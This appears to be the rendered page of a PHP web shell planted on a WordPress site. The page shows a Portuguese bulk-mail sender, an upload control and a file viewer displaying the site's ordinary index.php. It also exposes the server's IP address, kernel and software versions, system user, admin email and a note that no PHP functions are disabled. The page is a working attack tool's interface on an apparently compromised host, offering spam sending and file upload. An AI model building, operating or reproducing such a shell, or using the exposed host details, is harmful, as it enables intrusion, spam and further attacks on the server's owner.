Envio de Emails phpmail

*Lembrete: texto em HTML *Separado por quebra de linha
Nome do Servidor: Linux gsoft-dev 5.14.0-598.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Jul 8 16:37:49 UTC 2025 x86_64
Sistema Operacional: Linux
Endereço IP: 160.251.83.132
Software usado: Apache/2.4.62 (CentOS Stream) OpenSSL/3.5.1 SVN/1.14.1 Phusion_Passenger/6.0.27
Email admin: info@gsoft.co.jp
Safe Mode:
HEX
HEX
Server: Apache/2.4.62 (CentOS Stream) OpenSSL/3.5.1 SVN/1.14.1 Phusion_Passenger/6.0.27
System: Linux gsoft-dev 5.14.0-598.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Jul 8 16:37:49 UTC 2025 x86_64
User: ghd (1006)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: /home/ghd/htdocs/index.php
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';